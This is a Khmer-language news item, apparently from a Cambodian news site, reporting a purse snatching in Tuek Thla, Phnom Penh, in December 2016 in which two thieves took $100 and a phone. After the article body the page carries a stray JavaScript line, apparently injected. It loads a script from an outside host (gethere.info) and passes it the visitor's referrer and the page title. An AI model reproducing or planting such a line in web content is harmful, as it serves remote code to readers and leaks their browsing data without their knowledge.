ព្រឹតិ្តការណ៍ថ្មីៗ

ញយដងពេកហើយទឹកថ្លា! ស្ត្រីម្នាក់ត្រូវក្រុមចោរឆក់កាបូបបានសំរេចអស់លុយ១០០ដុល្លានិងទូរសព្ទ័មួយគ្រឿង!

2 ឆ្នាំ មុន 0 តូ សុផល

 ភ្នំពេញ ៖ សង្កាត់ទឹកថ្លាមានឈ្មោះបោះសម្លេងល្បីរន្ទឺតែខាងបទល្មើស លួច ឆក់ ប្លន់ បនល្បែង និងគ្រឿងញៀន ធ្វើអោយជនរងគ្រោះច្រើននាក់បាត់បងរបស់ទ្រព្យ និងបង្កអោយមានរបួសស្នាមថែមទៀតផង។ បើទៅអង្គុយនៅប៉ុស្តិ៍រដ្ឋបាលសង្កាត់ទឹកថ្លាតែមួយថ្ងៃនោះប្រាកដជានិងឃើញបងប្អូនប្រជាពលរដ្ឋមកដាក់ពាក្យបណ្តឹងករណីគ្រប់ជំពូក ជាពិសេស ករណីចោរកាច់ ក ម៉ូតូ គាស់បន្ទប់ជួល និងករណីចោរឆក់ជាដើម។ ជាក់ស្តែង នារីម្នាក់ត្រូវបានក្រុមចោរមួយក្រុមគ្នា២នាក់ តាមឆក់កាបូបស្ពាយចំហៀងបានសំរឹចដោយសុវត្ថិភាព ។ ហេតុការណ៍នេះបានកើតឡើងកាលពីវេលាម៉ោង ២១និង៣០នាទីយប់ថ្ងៃទី ១៩ខែធ្នូ ឆ្នាំ ២០១៦ ត្រង់ចំនុចព្រះវិហារចិន តាកាប៉ោង ស្ថិតតាមបណ្ដោយមហាវិថីសហពន្ធរុស្សី ស្ថិតក្នុងសង្កាត់ទឹកថ្លា ខណ្ឌសែនសុខ។

នារីជាជនរងគ្រោះមិនបានប្រាប់ឈ្មោះបានរៀបរាប់ថាមុនពេលកើតហេតុ គាត់ទើបតែចេញមកពីញាំអីជាមួយមិត្តភក្ដិនៅម្ដុំផ្សារដេរប៉ូ ហើយក្រោយមកបានជិះម៉ូតូមួយគ្រឿងម៉ាកស្កូពីពណ័សលាយក្រហមពាក់ស្លាកលេខភ្នំពេញ 1CW- 4133 ជិះតែម្នាក់ឯងបំណងត្រលប់ទៅផ្ទះវិញនៅម្ដុំផ្សាដីហុយហើយខណះពេលកំពុងតែជិះម៉ូតូដល់វំនុចកើតហេតុស្រាប់តែមានក្រុមចោរមួយក្រុមគ្នា២នាក់ជិះម៉ូតូមួយគ្រឿងម៉ាកស្មាស់ពណ័ខ្មៅមិនចាំស្លាកលេខបានជិះមកធ្វើសកម្មភាពឆក់កាបូបស្ពាយចំហៀងរបស់នារីរងគ្រោះបានសំរេចហើយជិះចេញទៅដោយដុវត្ថិភាព ។

នារីរងគ្រោះបានបន្តថានៅក្នុងកាបូបស្ពាយចំហៀងរបស់នាងមានដូចជាលុយចំនួន១០០ដុល្លានិងទូរសព្ទ័ដៃមួយគ្រឿងម៉ាសាំសុងមួយគ្រឿង។

ក្រោយពេលកើតហេតុនារីរងគ្រោះបានជិះម៉ូតូត្រលប់ទៅផ្ទះវិញដោយមិនបានដាក់ពាក្យបណ្ដឹងនោះទេ រងចាំស្អែកទើបដាក់ពាក្យបណ្ដឹង៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ